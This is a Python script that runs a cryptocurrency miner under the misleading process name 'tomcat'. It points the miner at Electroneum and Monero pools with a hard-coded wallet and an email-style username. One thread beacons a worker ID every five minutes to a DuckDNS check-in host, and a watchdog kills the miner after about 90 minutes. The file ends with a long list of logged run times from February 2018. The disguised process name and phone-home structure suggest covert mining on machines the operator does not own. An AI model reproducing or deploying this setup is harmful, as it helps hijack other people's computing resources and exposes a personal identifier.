import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:51:05.283799
#2018-02-17 17:38:01.337336
#2018-02-17 19:25:05.781065
#2018-02-17 21:15:01.577130
#2018-02-17 22:58:04.821471
#2018-02-18 00:44:04.192517
#2018-02-18 02:32:01.776579
#2018-02-18 04:19:06.580676
#2018-02-18 06:10:05.281050
#2018-02-18 08:01:06.533375
#2018-02-18 09:49:01.302924
#2018-02-18 11:36:07.366417
#2018-02-18 13:22:01.551454
#2018-02-18 15:12:02.013157
#2018-02-18 16:59:07.617758
#2018-02-18 18:46:06.248107
#2018-02-18 20:33:05.170848
#2018-02-18 22:18:06.688399
#2018-02-19 00:07:03.858556
#2018-02-19 01:53:07.448191
#2018-02-19 03:40:05.103108
#2018-02-19 05:25:07.390250
#2018-02-19 07:13:05.435532
#2018-02-19 09:03:06.652175
#2018-02-19 10:52:07.414883
#2018-02-19 12:42:07.244017
#2018-02-19 14:31:08.719064
#2018-02-19 16:19:08.458409
#2018-02-19 18:07:01.989870
#2018-02-19 19:53:06.520767
#2018-02-19 21:41:08.540301
#2018-02-19 23:27:04.336029
#2018-02-20 01:13:01.637479
#2018-02-20 03:02:04.799909
#2018-02-20 04:48:01.377142
#2018-02-20 06:32:04.231146
#2018-02-20 08:16:05.638585
#2018-02-20 10:01:07.617468
#2018-02-20 11:46:08.433412
#2018-02-20 13:33:05.189519
#2018-02-20 15:17:07.956448
#2018-02-20 17:02:04.854685
#2018-02-20 18:49:06.013183
#2018-02-20 20:40:10.430156
#2018-02-20 22:26:05.650439
#2018-02-21 00:08:06.845834
#2018-02-21 01:55:03.540253
#2018-02-21 03:43:07.257433
#2018-02-21 05:32:06.599995
#2018-02-21 07:20:04.100099
#2018-02-21 09:05:04.118339
#2018-02-21 10:53:06.775217
#2018-02-21 12:41:01.687767
#2018-02-21 14:30:01.780203
#2018-02-21 16:16:08.037034
#2018-02-21 18:07:08.580886
#2018-02-21 19:53:07.650466
#2018-02-21 21:40:10.091610
#2018-02-21 23:27:05.782763
#2018-02-22 01:15:04.258134
#2018-02-22 03:04:01.960471
#2018-02-22 04:49:02.005096
#2018-02-22 06:34:03.674626
#2018-02-22 08:22:02.125071
#2018-02-22 10:09:03.669727
#2018-02-22 11:55:10.468468
#2018-02-22 13:39:01.791573
#2018-02-22 15:27:04.512367
#2018-02-22 17:13:07.504167
#2018-02-22 18:59:06.694997
#2018-02-22 20:51:06.353815
#2018-02-22 22:38:09.014665
#2018-02-23 00:26:04.412570
#2018-02-23 02:13:05.853490
#2018-02-23 04:03:06.154313
#2018-02-23 05:47:08.604698
#2018-02-23 07:40:09.037713
#2018-02-23 09:43:05.293943
#2018-02-23 11:48:08.429416
#2018-02-23 13:38:05.594211
#2018-02-23 15:26:05.984089
#2018-02-23 17:16:09.517180
#2018-02-23 19:01:05.328737
#2018-02-23 20:47:05.680963
#2018-02-23 22:31:01.984144
#2018-02-24 00:16:07.176078
#2018-02-24 02:08:06.025951
#2018-02-24 03:57:06.580915
#2018-02-24 05:43:05.416485
#2018-02-24 07:34:04.121566
#2018-02-24 09:20:06.613767
#2018-02-24 11:12:06.508607
#2018-02-24 13:01:03.932308
#2018-02-24 14:48:07.619861
#2018-02-24 16:40:07.787413
#2018-02-24 18:29:02.030959
#2018-02-24 20:15:03.974565
#2018-02-24 22:05:03.765305
#2018-02-25 02:29:01.610849
#2018-02-25 06:08:07.476605
#2018-02-25 11:38:01.704516